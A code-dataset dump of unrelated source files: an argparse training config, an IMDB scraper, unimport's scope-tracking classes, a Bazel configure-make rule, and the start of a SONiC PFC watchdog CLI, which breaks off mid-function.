content stringlengths 5 1.05M |
|---|
from datetime import datetime
import argparse
class ArgParser:
    """Command-line configuration for training: paths, intervals, and flags."""

    def __init__(self):
        # NOTE: --checkpoint-prefix defaults to the timestamp computed once,
        # at class-definition time, not per invocation.
        parser = argparse.ArgumentParser()
        parser.add_argument('--dataset-dir', dest='dataset_dir', type=str, default='../celeba')
        parser.add_argument('--condition-file', type=str, default='./list_attr_celeba.txt')
        parser.add_argument('--checkpoint', type=str, default=None)
        parser.add_argument('--result-dir', type=str, default='./fake_samples')
        parser.add_argument('--checkpoint-prefix', type=str, default=datetime.now().strftime("%d-%m-%Y_%H_%M_%S"))
        # Opt-out switches (store_false) for behaviors that default to on.
        parser.add_argument('-ncs', '--no-checkpoints-save', dest='save_checkpoints', action='store_false',
                            help='do not save checkpoints in regular intervals during training')
        parser.add_argument('--nrs', '--no-random-sample', dest='random_image_samples', action='store_false',
                            help='do not save random samples of fake faces during training')
        # Interval knobs, all measured in training iterations.
        parser.add_argument('--ii', '--training-info-interval', dest='training_info_interval', type=int, default=100,
                            help='controls how often during training info is printed')
        parser.add_argument('--si', '--sample-interval', dest='sample_interval', type=int, default=16000,
                            help='controls how often during training sample images are saved ')
        parser.add_argument('--ci', '--checkpoint-interval', dest='checkpoint_interval', type=int, default=16000,
                            help='controls how often during training a checkpoint is saved')
        parser.add_argument('--workers', type=int, default=8)
        parser.add_argument('--seed', dest='manual_seed', type=int, required=False)
        parser.add_argument('--fixed-noise-sample', dest='fixed_noise_sample', action='store_true',
                            help='show model progression by generating samples with the same fixed noise vector during training')
        parser.set_defaults(save_checkpoints=True, random_image_samples=True,
                            fixed_noise_sample=False)
        self.parser = parser

    def get_config(self):
        """Parse the command line, silently ignoring unrecognized arguments."""
        config, _unknown = self.parser.parse_known_args()
        return config
|
import requests
from bs4 import BeautifulSoup, ResultSet
import pandas as pd
import time
import numpy as np
from typing import Union
class Scraper(object):
    """Scrapes top-grossing IMDB movies per genre and writes them to a CSV.

    Fixes relative to the previous revision:
    - Return annotations like ``Union[str or None]`` evaluated to plain
      ``str`` (``str or None`` is just ``str``); they are now spelled
      ``Union[x, None]``.
    - The per-field parsers caught only ``ValueError``, but when a tag is
      absent ``find(...)`` returns ``None`` and the following attribute /
      subscript access raises ``AttributeError``/``TypeError``/``IndexError``,
      which previously crashed the scrape. All parse failures now uniformly
      yield ``np.nan``.
    """

    # Errors meaning "field missing or malformed on the page".
    _PARSE_ERRORS = (AttributeError, IndexError, TypeError, ValueError)

    def __init__(
        self,
        id: str = "Turing-College-capstone-project-work",
        web_browser: str = "Mozilla/5.0",
        url_for_movie_categories: str = "https://www.imdb.com/feature/genre/?ref_=nv_ch_gr",
        number_of_movies_per_category: int = 1,
        title_of_csv_file: str = "scraped_imdb_file",
        timeout: int = 2,
    ):
        """
        Initialization.

        :param id: Id used to construct scraper headers.
        :param web_browser: web browser information used to construct scraper headers.
        :param url_for_movie_categories: Url used to collect movie categories for scraping.
        :param number_of_movies_per_category: default is set to 1.
        :param title_of_csv_file: Default "scraped_imdb_file".
        :param timeout: Time duration between page iterations, to avoid spamming the IMDB server.
        """
        self.header = {id: web_browser}
        self.url_for_movie_categories = url_for_movie_categories
        self.number_of_movies_per_category = number_of_movies_per_category
        self.title_of_csv_file = title_of_csv_file
        self.timeout = timeout
        # Accumulates one dict per scraped movie; reused across calls, so
        # repeated collect_information() calls append to the same list.
        self.list = []

    def get_page_response(self, url: str, header: dict) -> BeautifulSoup:
        """
        Retrieves a page from the IMDB server and parses it.

        :param url: desired url.
        :param header: identification headers constructed during initialization.
        :return: parsed page, or None (after printing an error) when the
            response status is not OK.
        """
        self.response = requests.get(url, headers=header)
        soup = BeautifulSoup(self.response.text, "html.parser")
        if not self.response.ok:
            print(f"There is an {self.response} error")
        else:
            return soup

    def collect_movie_categories(self) -> list:
        """
        Scrapes IMDB movie categories.

        :return: list with all category titles from IMDB.
        """
        soup = self.get_page_response(
            url=self.url_for_movie_categories, header=self.header
        )
        all_categories = soup.find_all("div", class_="widget_image")
        return [movie_genre.find("img")["title"] for movie_genre in all_categories]

    def create_page_list(self) -> list:
        """
        Creates the list of start indices used to page through IMDB results
        (IMDB lists 50 movies per page, starting at 1, 51, 101, ...).

        :return: list of start indices.
        """
        return list(range(1, self.number_of_movies_per_category + 1, 50))

    def scrape_one_page(
        self, category: str, page: int, timeout: float
    ) -> ResultSet:
        """
        Builds the search URL for one category/page and scrapes its movie blocks.

        :param category: category used to construct the URL for scraping.
        :param page: start index of the page (1, 51, 101, ...).
        :param timeout: sleep duration after the request, to avoid spamming IMDB.
        :return: ResultSet of per-movie HTML blocks.
        """
        print(f"Now scraping {category} movies from page starting with movie id {page}")
        url = f"https://www.imdb.com/search/title/?genres={category}&sort=boxoffice_gross_us,desc&start={page}&explore=title_type,genres&ref_=adv_nxt"
        soup = self.get_page_response(url=url, header=self.header)
        all_movies_on_page = soup.find_all("div", class_="lister-item")
        time.sleep(timeout)
        return all_movies_on_page

    @staticmethod
    def get_movie_title(movie_info: BeautifulSoup) -> Union[str, None]:
        """
        :param movie_info: BeautifulSoup object containing movie info.
        :return: the movie title, or np.nan when it cannot be parsed.
        """
        try:
            return str(
                movie_info.find("span", class_="lister-item-index").find_next().text
            )
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_year(
        movie_info: BeautifulSoup,
    ) -> Union[int, None]:
        """
        :param movie_info: BeautifulSoup object containing movie info.
        :return: the movie release year, or np.nan when it cannot be parsed.
        """
        try:
            # Slice keeps only the numeric part, e.g. "(2010)" -> "2010".
            return int(movie_info.find("span", class_="lister-item-year").text[1:5])
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_certificate(
        movie_info: BeautifulSoup,
    ) -> Union[str, None]:
        """
        :param movie_info: BeautifulSoup object containing info about the movie.
        :return: the movie certificate (age restriction), or np.nan when missing.
        """
        try:
            return str(movie_info.find("span", class_="certificate").text)
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_runtime(
        movie_info: BeautifulSoup,
    ) -> Union[str, None]:
        """
        :param movie_info: BeautifulSoup object containing info about the movie.
        :return: the movie runtime string, or np.nan when missing.
        """
        try:
            return str(movie_info.find("span", class_="runtime").text)
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_genres(
        movie_info: BeautifulSoup,
    ) -> Union[str, None]:
        """
        :param movie_info: BeautifulSoup object containing info about the movie.
        :return: the associated genres string, or np.nan when missing.
        """
        try:
            # Slice drops the leading newline; rstrip removes trailing spaces.
            return str(movie_info.find("span", class_="genre").text.rstrip()[1:])
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_rating(movie_info: BeautifulSoup) -> Union[float, None]:
        """
        :param movie_info: BeautifulSoup object containing info about the movie.
        :return: the IMDB rating as a float, or np.nan when missing.
        """
        try:
            return float(
                movie_info.find("div", class_="inline-block ratings-imdb-rating")[
                    "data-value"
                ]
            )
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_metascore(movie_info: BeautifulSoup) -> Union[int, None]:
        """
        :param movie_info: BeautifulSoup object containing info about the movie.
        :return: the Metascore rating as an int, or np.nan when missing.
        """
        try:
            return int(movie_info.find("span", class_="metascore").text.rstrip())
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_votes(movie_info: BeautifulSoup) -> Union[int, None]:
        """
        :param movie_info: BeautifulSoup object containing info about the movie.
        :return: the number of votes as an int, or np.nan when missing.
        """
        try:
            return int(
                movie_info.find(
                    "p", class_="sort-num_votes-visible"
                ).findChildren("span")[1]["data-value"]
            )
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_box_office(movie_info: BeautifulSoup) -> Union[int, None]:
        """
        :param movie_info: BeautifulSoup object containing info about the movie.
        :return: the US box office earnings as an int, or np.nan when missing.
        """
        try:
            return int(
                movie_info.find("p", class_="sort-num_votes-visible")
                .findChildren("span")[4]["data-value"]
                .replace(",", "")
            )
        except Scraper._PARSE_ERRORS:
            return np.nan

    @staticmethod
    def get_movie_category(category: str) -> Union[str, None]:
        """
        :param category: category of the movie.
        :return: the category as a string, or np.nan when None/unconvertible.
        """
        try:
            if category is None:
                return np.nan
            return str(category)
        except ValueError:
            return np.nan

    @staticmethod
    def write_to_csv(dataframe, title_of_csv_file: str) -> None:
        """
        Creates a csv file from a dataframe.

        :param dataframe: Pandas dataframe to serialize.
        :param title_of_csv_file: desired csv file name (without extension).
        :return: None; the file is written to the working directory.
        """
        print(" >> Your csv file was created successfully << ")
        return dataframe.to_csv(
            f"{title_of_csv_file}.csv", index=None, header=True, na_rep=np.nan
        )

    def collect_information(self) -> pd.DataFrame:
        """
        Runs the full scrape: every category, every page, every movie.

        :return: Pandas DataFrame with one row per scraped movie.
        """
        main_category_list = self.collect_movie_categories()
        page_list = self.create_page_list()
        for genre in main_category_list:
            for page in page_list:
                all_movies_on_page = self.scrape_one_page(
                    page=page, category=genre, timeout=self.timeout
                )
                for movie in all_movies_on_page:
                    self.list.append(
                        {
                            "title": self.get_movie_title(movie_info=movie),
                            "year": self.get_movie_year(movie_info=movie),
                            "certificate": self.get_movie_certificate(movie_info=movie),
                            "length": self.get_movie_runtime(movie_info=movie),
                            "genres": self.get_movie_genres(movie_info=movie),
                            "rating": self.get_movie_rating(movie_info=movie),
                            "metascore": self.get_movie_metascore(movie_info=movie),
                            "total_votes": self.get_movie_votes(movie_info=movie),
                            "category": self.get_movie_category(category=genre),
                            "US_box_office": self.get_movie_box_office(
                                movie_info=movie
                            ),
                        }
                    )
        return pd.DataFrame(self.list)

    def scrape_imdb(
        self, number_of_movies_per_category: int, name_of_csv_file: str
    ) -> None:
        """
        Entry point: scrape and write the CSV in one call.

        :param number_of_movies_per_category: desired number of movies per category.
        :param name_of_csv_file: desired name of the csv file (without extension).
        :return: None; a CSV file is created in the project directory.
        """
        self.number_of_movies_per_category = number_of_movies_per_category
        self.title_of_csv_file = name_of_csv_file
        self.write_to_csv(self.collect_information(), self.title_of_csv_file)
|
import os
import sys
def _hook(name,value,out):
if name == 'extra_drop_list':
if len(value) <= 0 :
out.write("{}")
return True
temp_array = value.split('|')
out.write("{");
for i in range(len(temp_array)):
out.write(temp_array[i] + ",")
out.write("}")
return True
elif name == 'open_copy_list':
if len(value) <= 0 :
out.write("{}")
return True
temp_array = value.split('|')
out.write("{");
for i in range(len(temp_array)):
out.write(temp_array[i] + ",")
out.write("}")
return True
elif name == 'prev_copy_list':
if len(value) <= 0 :
out.write("{}")
return True
temp_array = value.split('|')
out.write("{");
for i in range(len(temp_array)):
out.write(temp_array[i] + ",")
out.write("}")
return True
elif name == 'monster_group':
if len(value) <= 0 :
out.write("{}")
return True
all_arrays = value.split('|')
out.write("{");
for i in range(len(all_arrays)):
all_objs = all_arrays[i].split(':')
out.write("{monster_id = " + all_objs[0] + ", born_point = " + all_objs[1] + " },")
out.write("}")
return True
return False
return False |
from pwn import *
from pwnlib.util.hashes import *
from pwncli.utils import *
from pwncli.cli import *
|
from dataclasses import dataclass, field
from datetime import datetime
from pathlib import Path
@dataclass
class Detail:
    """A single chunk of work: how many hours of which kind."""
    hours: int  # hours spent on this entry
    kind: str   # free-form label describing the kind of work
@dataclass
class Day:
    """Work log for one calendar day, aggregating hours over its entries."""
    date: datetime  # the day being logged
    hours: int = 0  # running total across all details
    details: list[Detail] = field(default_factory=list)  # individual entries

    def add_work(self, hours: int, work_kind: str) -> None:
        """Record *hours* of *work_kind* and update the daily total."""
        self.hours += hours
        self.details.append(Detail(hours, work_kind))
@dataclass
class Sheet:
    """A timesheet loaded from an org file, holding one Day per date."""
    org_filename: Path  # source org-mode file this sheet was read from
    days: dict[datetime, Day] = field(default_factory=dict)  # date -> Day

# Alias for a date-keyed mapping of work days (presumably kept in sorted
# insertion order by the producer -- confirm against callers).
SortedWorkDays = dict[datetime, Day]
|
import ast
import operator
import sys
from dataclasses import dataclass, field
from typing import ClassVar, Iterator, List, Set, Union
if sys.version_info >= (3, 8):
from typing import Literal # unimport: skip
else:
from typing_extensions import Literal
__all__ = ["Import", "ImportFrom", "Name", "Scope"]
@dataclass
class Import:
    """Record of a plain ``import x`` statement found during AST traversal.

    Instances are appended to the class-level ``imports`` registry by
    :meth:`register`; ``Name`` and ``Scope`` cooperate with this registry to
    decide which imports are unused or duplicated.
    """

    # Global registry of every import seen so far (shared with subclasses).
    imports: ClassVar[List[Union["Import", "ImportFrom"]]] = []
    lineno: int
    column: int
    name: str
    package: str
    # Owning AST node; assigned after construction in register().
    node: ast.AST = field(init=False, repr=False, compare=False)

    def __len__(self) -> int:
        # Number of dotted components in the imported name ("a.b.c" -> 3).
        return operator.length_hint(self.name.split("."))

    def is_match_sub_packages(self, name_name) -> bool:
        """Return True when *name_name* equals this import's top-level package."""
        return self.name.split(".")[0] == name_name

    @property
    def scope(self):
        # Scope this import was registered in. NOTE(review): may be None if
        # the import was never registered -- is_used() would then fail.
        return Scope.get_scope_by_current_node(self)

    def is_used(self) -> bool:
        """Return True when some name visible from this import's scope uses it."""
        for name in self.scope.names:
            if name is None:
                continue
            if name.match_import:
                # The name already resolved to an import; it only counts as a
                # use of this import if it resolved to *this* instance.
                if name.match_import == self:
                    return True
            elif name.match(self):
                return True
        return False

    def match_nearest_duplicate_import(self, name: "Name") -> bool:
        """For duplicated imports, test whether *self* is the one *name* binds to.

        Walks outward from the name's scope collecting matching imports that
        precede the name, then keeps the candidate with the greatest lineno
        (ties broken by greatest column). NOTE(review): candidates from an
        outer scope overwrite those of an inner one because the selection
        happens inside the while loop -- confirm this is intended.
        """
        nearest_import = None
        scope = name.scope
        while scope:
            imports = [
                _import
                for _import in scope.imports
                if name.match_2(_import) and name.lineno > _import.lineno
            ]
            scope = scope.parent
            if imports:
                nearest_import = max(
                    filter(
                        lambda _import: _import.lineno
                        == max(
                            imports, key=lambda _import: _import.lineno
                        ).lineno,
                        imports,
                    ),
                    key=lambda _import: _import.column,
                )
        if nearest_import == self:
            return True
        return False

    @property
    def is_duplicate(self) -> bool:
        # True when the same name appears more than once in the registry.
        return [_import.name for _import in self.imports].count(self.name) > 1

    @classmethod
    def get_unused_imports(
        cls, include_star_import: bool
    ) -> Iterator[Union["Import", "ImportFrom"]]:
        """Yield removable imports, last-registered first.

        Star imports are yielded whenever *include_star_import* is set;
        all other imports are yielded only when unused.
        """
        for imp in reversed(Import.imports):
            if (
                include_star_import
                and isinstance(imp, ImportFrom)
                and imp.star
            ):
                yield imp
            elif not imp.is_used():
                yield imp

    @classmethod
    def register(
        cls, lineno: int, column: int, name: str, package: str, node: ast.AST
    ) -> None:
        """Create an Import, attach its AST node, and record it globally."""
        _import = cls(lineno, column, name, package)
        _import.node = node
        cls.imports.append(_import)
        Scope.register(_import)

    @classmethod
    def clear(cls):
        """Reset the global import registry (between analyzed files)."""
        cls.imports.clear()
@dataclass
class ImportFrom(Import):
    """Record of a ``from x import y`` statement.

    Extends :class:`Import` with star-import information.
    """

    star: bool  # True for "from x import *"
    # Presumably replacement names offered for a star import -- confirm
    # against the producer of these records.
    suggestions: List[str]

    def is_match_sub_packages(self, name_name):
        # A "from" import binds an exact name, so top-level package matching
        # never applies.
        return False

    @classmethod
    def register(  # type: ignore
        cls,
        lineno: int,
        column: int,
        name: str,
        package: str,
        node: ast.AST,
        star: bool,
        suggestions: List[str],
    ) -> None:
        """Create an ImportFrom, attach its AST node, and record it globally."""
        _import = cls(lineno, column, name, package, star, suggestions)
        _import.node = node
        cls.imports.append(_import)
        Scope.register(_import)
@dataclass
class Name:
    """Record of a name usage found during AST traversal."""

    # Global registry of every name seen so far.
    names: ClassVar[List["Name"]] = []
    lineno: int
    name: str
    # Owning AST node; assigned after construction in register().
    node: ast.AST = field(init=False, repr=False, compare=False)
    # True when this name originates from an __all__ declaration.
    is_all: bool = False
    # The import this name resolved to; False until match() succeeds.
    match_import: Union[Import, Literal[False]] = field(
        init=False, repr=False, compare=False, default=False
    )

    @property
    def is_attribute(self):
        # Dotted usage such as "pkg.mod.attr".
        return "." in self.name

    def match_2(self, imp: Union[Import, ImportFrom]) -> bool:
        """Return True when *imp* could satisfy this name (ignoring duplicates)."""
        if self.is_all:
            # __all__ entries match by exact name regardless of position.
            is_match = self.name == imp.name
        elif self.is_attribute:
            # Compare only as many leading components as the import has.
            is_match = imp.lineno < self.lineno and (
                ".".join(self.name.split(".")[: len(imp)]) == imp.name
                or imp.is_match_sub_packages(self.name)
            )
        else:
            is_match = (imp.lineno < self.lineno) and (
                self.name == imp.name or imp.is_match_sub_packages(self.name)
            )
        return is_match

    def match(self, imp: Union[Import, ImportFrom]) -> bool:
        """Like match_2, but resolves duplicates and caches the winning import."""
        is_match = self.match_2(imp)
        if is_match and imp.is_duplicate:
            # Among duplicated imports, only the nearest one above us counts.
            is_match = imp.match_nearest_duplicate_import(self)
        if is_match:
            self.match_import = imp
        return is_match

    @property
    def scope(self):
        # Scope this name was registered in (None when not found).
        return Scope.get_scope_by_current_node(self)

    @classmethod
    def register(
        cls, lineno: int, name: str, node: ast.AST, is_all: bool = False
    ) -> None:
        """Create a Name, attach its AST node, and record it globally.

        __all__ names (is_all=True) are registered into the global scope.
        """
        _name = cls(lineno, name, is_all)
        _name.node = node
        cls.names.append(_name)
        Scope.register(_name, is_global=is_all)

    @classmethod
    def clear(cls) -> None:
        """Reset the global name registry (between analyzed files)."""
        cls.names.clear()
@dataclass
class Scope:
    """Lexical scope tree used to resolve name-to-import visibility.

    ``scopes`` holds every scope ever registered; ``current_scope`` is the
    stack of scopes entered during AST traversal (global scope at index 0).
    """

    # All scopes known so far (lazily extended by get_previous_scope).
    scopes: ClassVar[List["Scope"]] = []
    # Traversal stack; last element is the innermost open scope.
    current_scope: ClassVar[List["Scope"]] = []
    node: ast.AST
    # Imports and names registered directly in this scope.
    current_nodes: List[Union[Import, ImportFrom, Name]] = field(
        init=False, repr=False, compare=False, default_factory=list
    )
    # Enclosing scope; None only for the global scope.
    parent: "Scope" = field(repr=False, default=None)
    # Scopes nested (directly or transitively) inside this one.
    child_scopes: Set["Scope"] = field(
        init=False, repr=False, compare=False, default_factory=set
    )

    def __hash__(self) -> int:
        # Identity follows the AST node the scope wraps.
        return hash(self.node)

    @classmethod
    def get_curent_scope(cls) -> "Scope":
        """Return the innermost open scope (top of the traversal stack)."""
        return cls.current_scope[-1]

    @classmethod
    def get_global_scope(cls) -> "Scope":
        """Return the module-level scope (always scopes[0])."""
        global_scope = cls.scopes[0]
        assert global_scope.parent is None
        return global_scope

    @classmethod
    def add_global_scope(cls, tree: ast.AST) -> None:
        """Open the module-level scope; must be called before any other add."""
        parent = None
        scope = Scope(tree, parent)
        cls.current_scope.append(scope)
        cls.scopes.append(scope)  # global scope added to cls.scopes

    @classmethod
    def add_current_scope(cls, node: ast.AST) -> None:
        """Open a nested scope under the current one (entering a def/class)."""
        parent = cls.get_curent_scope()
        scope = Scope(node, parent)
        cls.current_scope.append(scope)

    @classmethod
    def remove_current_scope(cls):
        """Close the innermost scope (leaving a def/class)."""
        cls.current_scope.pop()

    @classmethod
    def register(
        cls, current_node: Union[Import, ImportFrom, Name], *, is_global=False
    ) -> None:
        """Attach *current_node* to its scope and link the child-scope chain.

        is_global forces registration into the module scope (used for
        __all__ names).
        """
        scope = cls.get_previous_scope(
            cls.get_global_scope() if is_global else cls.get_curent_scope()
        )
        # current nodes add to scope
        scope.current_nodes.append(current_node)
        # child scopes add to scope
        if scope.parent is None:
            return
        # Walk up the parent chain, recording this scope as a descendant of
        # every ancestor except the global scope.
        parent = cls.get_previous_scope(scope.parent)
        child_scope = scope
        while parent:
            parent.child_scopes.add(child_scope)
            child_scope = parent
            if parent.parent is None:
                break
            parent = cls.get_previous_scope(parent.parent)

    @classmethod
    def get_scope_by_current_node(
        cls, current_node: Union[Import, ImportFrom, Name]
    ) -> "Scope":
        """Return the scope holding *current_node*, or None when unknown."""
        for scope in cls.scopes:
            if current_node in scope.current_nodes:
                return scope
        return None

    @property
    def names(self) -> Iterator[Name]:
        """Yield names of this scope, then (recursively) of all child scopes."""
        yield from filter(  # type: ignore
            lambda node: isinstance(node, Name), self.current_nodes
        )
        for child_scope in self.child_scopes:
            yield from child_scope.names

    @property
    def imports(self) -> Iterator[Import]:
        """Yield imports registered directly in this scope (not children)."""
        yield from filter(  # type: ignore
            lambda node: isinstance(node, Import), self.current_nodes
        )

    @classmethod
    def get_previous_scope(cls, scope: "Scope") -> "Scope":
        """Return the registered scope equal to *scope*, registering it if new."""
        for _scope in cls.scopes:
            if _scope == scope:
                return _scope
        cls.scopes.append(scope)
        return scope

    @classmethod
    def clear(cls):
        """Reset the scope registry (between analyzed files)."""
        cls.scopes.clear()
|
class TaskInstanceConfig(object):
    """Per-instance resource/duration snapshot taken from a TaskConfig."""

    def __init__(self, task_config):
        # Copy the scalar fields one by one off the source config.
        for attr in ("cpu", "memory", "disk", "duration"):
            setattr(self, attr, getattr(task_config, attr))
class TaskConfig(object):
    """Static description of one task: replicas, resources, duration, parents."""

    def __init__(self, task_index, instances_number, cpu, memory, disk, duration, parent_indices=None):
        self.task_index = task_index
        self.instances_number = instances_number
        # Per-instance resource demands.
        self.cpu, self.memory, self.disk = cpu, memory, disk
        self.duration = duration
        # Indices of prerequisite tasks; None means no dependencies.
        self.parent_indices = parent_indices
class JobConfig(object):
    """A job: its id, submission time, and the configs of its tasks."""

    def __init__(self, idx, submit_time, task_configs):
        self.id = idx
        self.submit_time = submit_time
        self.task_configs = task_configs
|
# -*- Python -*-
def _cc_configure_make_impl(ctx):
    """Rule implementation: run ./configure && make install in temp dirs.

    Declares an include-directory artifact and a static-library file, drives
    the configure/make flow inside mktemp directories, then copies the
    installed library and headers into the declared outputs.
    """
    out_includes = ctx.actions.declare_directory(ctx.attr.name + "-includes.h")
    out_lib = ctx.actions.declare_file("{}.a".format(ctx.attr.name))
    outputs = [out_includes, out_lib]
    cpp_fragment = ctx.fragments.cpp
    compiler_options = []  # cpp_fragment.compiler_options(ctx.features)
    c_options = compiler_options + cpp_fragment.c_options
    cxx_options = compiler_options + cpp_fragment.cxx_options(ctx.features)
    # Quote the joined flag lists so they survive as single shell words below.
    CFLAGS = "\"{}\"".format(' '.join(c_options))
    CXXFLAGS = "\"{}\"".format(' '.join(cxx_options))
    # Run ./configure && make from a temporary directory, and install into another temporary directory.
    # Finally, copy the results into the directory artifact declared in out_includes.
    ctx.actions.run_shell(
        mnemonic="ConfigureMake",
        inputs=ctx.attr.src.files,
        outputs=outputs,
        command='\n'.join([
            "set -e", "P=$(pwd)", "tmpdir=$(mktemp -d)",
            "tmpinstalldir=$(mktemp -d)",
            # Both temp dirs are removed whatever way the script exits.
            "trap \"{ rm -rf $tmpdir $tmpinstalldir; }\" EXIT",
            "pushd $tmpdir",
            "CFLAGS={} CXXFLAGS={} $P/{}/configure --prefix=$tmpinstalldir {}".
            format(CFLAGS, CXXFLAGS, ctx.attr.src.label.workspace_root,
                   ' '.join(ctx.attr.configure_flags)),
            "CFLAGS={} CXXFLAGS={} make install".format(
                CFLAGS, CXXFLAGS), "popd", "cp $tmpinstalldir/{} {}".format(
                ctx.attr.out_lib_path,
                out_lib.path), "cp -R $tmpinstalldir/include/ {}".format(
                out_includes.path)
        ]),
        # Keep the build hermetic: no network access during configure/make.
        execution_requirements={"block-network": ""})
    return [
        DefaultInfo(files=depset(direct=outputs)),
        OutputGroupInfo(
            headers=depset([out_includes]), libfile=depset([out_lib]))
    ]
# Private rule wrapper around _cc_configure_make_impl; callers should use the
# cc_configure_make macro below instead of instantiating this directly.
_cc_configure_make_rule = rule(
    attrs={
        "configure_flags": attr.string_list(),
        "src": attr.label(mandatory=True),
        "out_lib_path": attr.string(mandatory=True),
    },
    fragments=["cpp"],
    output_to_genfiles=True,
    implementation=_cc_configure_make_impl,
)
def cc_configure_make(name, configure_flags, src, out_lib_path):
    """Macro: build an autoconf project and expose it as cc_library *name*.

    Wires the configure/make rule to filegroups for its "libfile" and
    "headers" output groups, imports the static library, and publishes a
    cc_library combining the headers with the imported library.
    """
    rule_name = '_{}_cc_configure_make_rule'.format(name)
    _cc_configure_make_rule(
        name=rule_name,
        configure_flags=configure_flags,
        src=src,
        out_lib_path=out_lib_path)

    # Select the static library output of the rule.
    lib_filegroup = '_{}_libfile_fg'.format(name)
    native.filegroup(
        name=lib_filegroup,
        srcs=[rule_name],
        output_group="libfile",
    )
    lib_import = '_{}_libfile_import'.format(name)
    native.cc_import(
        name=lib_import,
        static_library=lib_filegroup,
    )

    # Select the installed headers output of the rule.
    headers_filegroup = '_{}_headers_fg'.format(name)
    native.filegroup(
        name=headers_filegroup,
        srcs=[rule_name],
        output_group="headers",
    )
    native.cc_library(
        name=name,
        hdrs=[headers_filegroup],
        includes=[rule_name + "-includes.h"],
        deps=[lib_import],
    )
|
import os
import imp
import sys
import click
import utilities_common.cli as clicommon
from natsort import natsorted
from sonic_py_common.multi_asic import get_external_ports
from tabulate import tabulate
from utilities_common import multi_asic as multi_asic_util
from utilities_common import constants
# Mock the redis DB for unit-test purposes: when UTILITIES_UNIT_TESTING is
# "2", the mock table modules under tests/ replace the real DB connectors.
try:
    if os.environ["UTILITIES_UNIT_TESTING"] == "2":
        modules_path = os.path.join(os.path.dirname(__file__), "..")
        tests_path = os.path.join(modules_path, "tests")
        sys.path.insert(0, modules_path)
        sys.path.insert(0, tests_path)
        import mock_tables.dbconnector
        if os.environ["UTILITIES_UNIT_TESTING_TOPOLOGY"] == "multi_asic":
            import mock_tables.mock_multi_asic
            imp.reload(mock_tables.mock_multi_asic)
        mock_tables.dbconnector.load_namespace_config()
except KeyError:
    # Env var absent -> normal (non-test) execution. NOTE(review): if only
    # UTILITIES_UNIT_TESTING_TOPOLOGY is unset, the KeyError also skips the
    # load_namespace_config() call above -- confirm that is intended.
    pass
# Default configuration (times in milliseconds); start_default() scales
# these up with the number of ports.
DEFAULT_DETECTION_TIME = 200
DEFAULT_RESTORATION_TIME = 200
DEFAULT_POLL_INTERVAL = 200
DEFAULT_PORT_NUM = 32
DEFAULT_ACTION = 'drop'
# Rows: (column title, counter key for first value, counter key for second);
# rendered as "first/second" in the stats table.
STATS_DESCRIPTION = [
    ('STORM DETECTED/RESTORED', 'PFC_WD_QUEUE_STATS_DEADLOCK_DETECTED', 'PFC_WD_QUEUE_STATS_DEADLOCK_RESTORED'),
    ('TX OK/DROP', 'PFC_WD_QUEUE_STATS_TX_PACKETS', 'PFC_WD_QUEUE_STATS_TX_DROPPED_PACKETS'),
    ('RX OK/DROP', 'PFC_WD_QUEUE_STATS_RX_PACKETS', 'PFC_WD_QUEUE_STATS_RX_DROPPED_PACKETS'),
    ('TX LAST OK/DROP', 'PFC_WD_QUEUE_STATS_TX_PACKETS_LAST', 'PFC_WD_QUEUE_STATS_TX_DROPPED_PACKETS_LAST'),
    ('RX LAST OK/DROP', 'PFC_WD_QUEUE_STATS_RX_PACKETS_LAST', 'PFC_WD_QUEUE_STATS_RX_DROPPED_PACKETS_LAST'),
]
# Rows: (column title, CONFIG_DB field name, default shown when unset).
CONFIG_DESCRIPTION = [
    ('ACTION', 'action', 'drop'),
    ('DETECTION TIME', 'detection_time', 'N/A'),
    ('RESTORATION TIME', 'restoration_time', 'infinite')
]
# Table headers: fixed columns plus the title of each description row.
STATS_HEADER = ('QUEUE', 'STATUS',) + list(zip(*STATS_DESCRIPTION))[0]
CONFIG_HEADER = ('PORT',) + list(zip(*CONFIG_DESCRIPTION))[0]
CONFIG_DB_PFC_WD_TABLE_NAME = 'PFC_WD'
# Main entrypoint
# Note: the docstring below doubles as the click --help text; do not edit it
# for style reasons.
@click.group()
def cli():
    """ SONiC PFC Watchdog """
def get_all_queues(db, namespace=None, display=constants.DISPLAY_ALL):
    """Return a naturally sorted list of queue names from COUNTERS_DB.

    :param db: DB connector exposing get_all() and COUNTERS_DB.
    :param namespace: ASIC namespace used when filtering to external ports.
    :param display: with DISPLAY_ALL, return every queue; otherwise drop
        queues whose port is internal (backend).
    :return: list of queue names such as "Ethernet0:3".
    """
    queue_names = db.get_all(db.COUNTERS_DB, 'COUNTERS_QUEUE_NAME_MAP')
    # Bug fix: fall back to an empty *list* (previously {}), keeping the
    # return type consistent for callers expecting a list.
    queues = list(queue_names.keys()) if queue_names else []
    if display == constants.DISPLAY_ALL:
        return natsorted(queues)
    # Filter out the backend ports: keep only queues whose port part
    # ("Ethernet0:3" -> "Ethernet0") is an external port.
    display_ports = [q.split(":")[0] for q in queues]
    display_ports = get_external_ports(display_ports, namespace)
    queues = [q for q in queues if q.split(":")[0] in display_ports]
    return natsorted(queues)
def get_all_ports(db, namespace=None, display=constants.DISPLAY_ALL):
    """Return a naturally sorted list of physical (EthernetX) port names."""
    all_port_names = db.get_all(db.COUNTERS_DB, 'COUNTERS_PORT_NAME_MAP')
    # Physical ports are the entries named EthernetX.
    port_names = {
        name: all_port_names[name]
        for name in all_port_names
        if name.startswith('Ethernet')
    }
    display_ports = list(port_names.keys())
    if display == constants.DISPLAY_EXTERNAL:
        # Restrict to front-panel (external) ports only.
        display_ports = get_external_ports(display_ports, namespace)
    return natsorted(display_ports)
def get_server_facing_ports(db):
    """Return ports whose DEVICE_NEIGHBOR is a server.

    Falls back to all VLAN member ports when no server neighbor is found.
    """
    candidates = db.get_table('DEVICE_NEIGHBOR')
    server_facing_ports = []
    for port in candidates:
        metadata = db.get_entry(
            'DEVICE_NEIGHBOR_METADATA', candidates[port]['name']
        )
        if not metadata:
            continue
        if metadata['type'].lower() != 'server':
            continue
        server_facing_ports.append(port)
    if not server_facing_ports:
        # No server neighbors configured; use the VLAN membership instead.
